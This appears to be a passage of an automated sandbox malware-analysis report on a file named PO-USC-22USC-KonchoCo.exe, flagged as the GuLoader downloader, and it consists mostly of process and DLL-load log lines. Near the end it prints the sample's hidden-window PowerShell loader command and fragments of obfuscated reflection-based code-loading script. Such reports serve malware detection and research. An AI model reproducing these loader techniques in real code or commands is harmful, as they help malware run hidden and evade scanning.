Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rstrtmgr.dll	Jump to behavior

Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: PO-USC-22USC-KonchoCo.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 00000001.00000002.3487057946.0000000006FBD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.3490237791.00000000080E0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000001.00000002.3487057946.0000000006F7A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.3487057946.0000000006F7A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: powershell.exe, 00000001.00000002.3487057946.0000000006F7A000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000001.00000002.3490629462.000000000C710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Cistercian $Kautioners $Resedaen), (Blanketweed @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:contentable = [AppDomain]::CurrentDomain.GetAssemblies()$gl
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Zelotens)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Steelified, $false).DefineType($Huggeblokkene, $

Obfuscated command line found

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"			Jump to behavior

Suspicious powershell command line found

Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Moralioralist=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Amphioxidae.Zin';$Relaying=$Moralioralist.SubString(7931,3);.$Relaying($Moralioralist)"
Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Moralioralist=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Amphioxidae.Zin';$Relaying=$Moralioralist.SubString(7931,3);.$Relaying($Moralioralist)"			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_043529A1 push cs; retf 0007h	1_2_043529A2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04351BA4 push edi; iretd	1_2_04351BAB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_070469D4 push es; ret	1_2_070469DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08A424A5 push FFFFFFA0h; ret	1_2_08A424A7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08A442F2 push edx; retf	1_2_08A442F4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08A45AC2 push 00000064h; ret	1_2_08A45AC5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08A448C8 push ss; iretd	1_2_08A448CA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08A42C2F push 00000002h; iretd	1_2_08A42C31
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08A4602A push cs; retf	1_2_08A4602B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08A44411 push ds; iretd	1_2_08A44407
